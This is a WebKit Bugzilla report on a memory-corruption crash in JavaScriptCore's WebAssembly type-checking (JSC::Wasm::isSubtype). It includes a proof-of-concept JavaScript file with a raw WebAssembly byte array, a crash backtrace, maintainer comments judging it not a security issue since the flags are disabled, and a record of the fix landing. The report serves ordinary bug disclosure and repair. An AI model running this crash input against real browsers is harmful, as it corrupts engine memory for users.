WebKit Bugzilla
RESOLVED FIXED
Bug 254412: [WASM] Memory Corruption in JSC::Wasm::isSubtype
https://bugs.webkit.org/show_bug.cgi?id=254412

Reported by CAO ZONG, 2023-03-24 06:26:02 PDT
Commit: cebd0f9727d7493fbbea4ebf321799bc0152642e
Build: Release
Flag: --useSinglePassBBQJIT=true --useWebAssemblyTypedFunctionReferences=true --useWebAssemblyGC=true

Poc:
```
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,222,128,128,128,0,5,80,0,95,4,124,0,112,0,126,0,126,0,80,0,96,3,127,127,127,1,127,96,0,0,80,0,96,1,107,1,15,107,0,107,0,125,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,126,80,0,96,15,107,0,107,0,125,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,126,1,127,3,130,128,128,128,0,1,1,4,133,128,128,128,0,1,112,1,1,8,5,132,128,128,128,0,1,1,16,32,13,131,128,128,128,0,1,0,2,7,136,128,128,128,0,1,4,109,97,105,110,0,0,9,139,128,128,128,0,1,6,0,65,0,11,112,1,210,0,11,10,179,132,128,128,0,1,176,4,0,210,0,65,212,0,253,15,65,226,0,253,109,253,126,253,126,253,126,253,126,253,195,1,4,3,26,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,67,0,0,0,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,2,107,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,11,65,226,196,137,147,6,253,15,253,126,65,226,196,137,3,253,15,253,195,1,253,109,253,29,0,5,26,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,67,0,0,0,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,66,0,11,2,4,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,65,0,11,11]);
var wasm_module = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_module);
var f = wasm_instance.exports.main;
f();
```

Backtrace:
```
#0  0x0000555556b8e4dc in JSC::Wasm::TypeDefinition::unroll() const ()
#1  0x0000555556b8e936 in JSC::Wasm::TypeDefinition::expand() const ()
#2  0x0000555556a3c2a3 in JSC::Wasm::isSubtype(JSC::Wasm::Type, JSC::Wasm::Type) ()
#3  0x0000555556b0253e in JSC::Wasm::FunctionParser<JSC::Wasm::LLIntGenerator>::unify(JSC::Wasm::LLIntGenerator::ControlType const&) ()
#4  0x0000555556af0095 in JSC::Wasm::FunctionParser<JSC::Wasm::LLIntGenerator>::parseExpression() ()
#5  0x0000555556ae825b in JSC::Wasm::FunctionParser<JSC::Wasm::LLIntGenerator>::parseBody() ()
#6  0x0000555556ae309f in JSC::Wasm::FunctionParser<JSC::Wasm::LLIntGenerator>::parse() ()
#7  0x0000555556ad1f72 in JSC::Wasm::parseAndCompileBytecode(unsigned char const*, unsigned long, JSC::Wasm::TypeDefinition const&, JSC::Wasm::ModuleInformation&, unsigned int) ()
#8  0x0000555556adfceb in JSC::Wasm::LLIntPlan::compileFunction(unsigned int) ()
#9  0x0000555556acddf0 in JSC::Wasm::EntryPlan::compileFunctions(JSC::Wasm::Plan::CompilationEffort) ()
#10 0x0000555556b95272 in JSC::Wasm::Worklist::Thread::work() ()
#11 0x0000555556c4afa3 in WTF::Detail::CallableWrapper<WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0, void>::call() ()
#12 0x0000555556c6c1ef in WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) ()
#13 0x0000555556cc71d6 in WTF::wtfThreadEntryPoint(void*) ()
#14 0x00007ffff5fd9609 in start_thread () from /lib/x86_64-linux-gnu/libpthread.so.0
#15 0x00007ffff5ba6133 in clone () from /lib/x86_64-linux-gnu/libc.so.6
```
Comment 1, Radar WebKit Bug Importer, 2023-03-24 06:26:12 PDT:
<rdar://problem/107184256>
Comment 2, Yusuke Suzuki, 2023-03-24 11:59:19 PDT:
> --useWebAssemblyTypedFunctionReferences=true
This is not implemented fully & not enabled. So, this is not a security issue.
Comment 3, Yusuke Suzuki, 2023-03-24 11:59:42 PDT:
Also, --useWebAssemblyGC=true is not implemented fully and not enabled.
Comment 4, Asumu Takikawa, 2024-01-26 16:00:53 PST:
Pull request:
https://github.com/WebKit/WebKit/pull/23334
Comment 5, EWS, 2024-01-30 16:35:40 PST:
Committed 273794@main (7b11aad047b2): <https://commits.webkit.org/273794@main>
Reviewed commits have been landed. Closing PR #23334 and removing active labels.